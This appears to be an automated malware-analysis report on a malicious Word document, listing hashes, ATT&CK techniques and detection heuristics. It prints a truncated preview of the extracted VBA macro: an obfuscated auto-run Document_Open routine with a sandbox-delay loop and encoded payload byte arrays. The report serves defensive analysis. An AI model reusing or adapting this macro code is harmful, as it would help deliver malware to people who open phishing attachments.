Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 85904711c84c26f0…

MALICIOUS

Office (OLE)

244.5 KB Created: 2015-12-20 00:46:00 Authoring application: Microsoft Office Word First seen: 2017-11-29
MD5: 445b264d9e4d49a84eecf310e34fafbf SHA-1: a62d98435385d67978bb1c259bdfc5dd03f227a9 SHA-256: 85904711c84c26f048452f2096201cb82b8e10cf97548bad518d44e5049c9b80
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function for execution. This indicates an attempt to run external code, likely a downloader for a second-stage payload. The heuristic 'SE_PASSWORD_ARCHIVE_LURE' suggests the document may also instruct the user to disable security or provide a password for an archive, a common tactic to bypass gateway scanning.

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    | Kind      | Source                                                  | Size
macros.bas  | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 45842 bytes
SHA-256: 0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long
#Else
Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long
#End If
Dim HLnJXH1bmOF3 As String, GyCvq As Integer
Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant
Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant
Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant
Sub Document_Open()
R7O1H2H3zI = 66 + "25"
On Error Resume Next
MD1XgpZ1pvB55y = 22 + "85"
Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long
Ea7EVpjs = 70 + "46"
Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0
BzWEvA933 = 88 + "20"
For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME
WFoVlONXW2AD = WFoVlONXW2AD + 1
Next Bna2eaHvItP2PN
JZL4UQ92uel4B = 23 + "62"
If WFoVlONXW2AD = Kf0pgDeD2QME Then
SeLEK = 56 + "91"
Dim S3VoJ54dB As Integer, B4HWNSKEwh As String
For S3VoJ54dB = 6 To 974
B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB
Next
JJcm1AOrQT3 = 14 + "18"
YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48)
Qio6JWniPunO = 41 + "8"
If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then
SmEqmQo7WIE = 98 + "90"
MYlp4jaVW = 67 + "77"
If zKK(73) = True Then
G2OERK33o = 48 + "8"
SiNwcydd
NsBU3RiWPAsR5kv = 90 + "79"
Else
NhJrp6cE4jcxsT5 = 89 + "58"
MA9o9cPSK5hcO
PMUmGTj7VBjk = 79 + "39"
End If
Else
W1JPoqO = 93 + "45"
MA9o9cPSK5hcO
LIx5J0DQDSAph = 98 + "30"
End If
CxR = 70 + "43"
Else
Yh9QEdd8 = 52 + "97"
MA9o9cPSK5hcO
HxFz4G3yVn = 75 + "27"
End If
HDyHXOIsEi7F = 86 + "94"
End Sub
Sub MA9o9cPSK5hcO()
DRJ9RcaC34U = 10 + "97"
Stop
Partition 58, 6, 35, 21
XmvssUFxoSD = Fix(90)
DateSerial 55, 60, 54
Beep
DateDiff "AyhPtMJO", 63, 89
REQh0kUI80hO = CVErr(10)
Round 50, 76
Resume
Log 51
H6JRAMZiRO1sMhOdf = 20 + "28"
End Sub
Sub JIT9N(PqcAr2DChjNPmswxj As Long)
Ofj = 29 + "74"
Dim MwUs As Long
D8vzZy23Yrz = 26 + "9"
MwUs = Timer + PqcAr2DChjNPmswxj
Do While Timer < MwUs
DoEvents
Loop
KKKBu1p93DmpgX = 77 + "1"
End Sub
Sub SiNwcydd()
G1I0ynas = 45 + "84"
On Error Resume Next
EIbYaWWMmRw = 69 + "45"
GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216)
PeP = 79 + "67"
GyCvq2
... (truncated)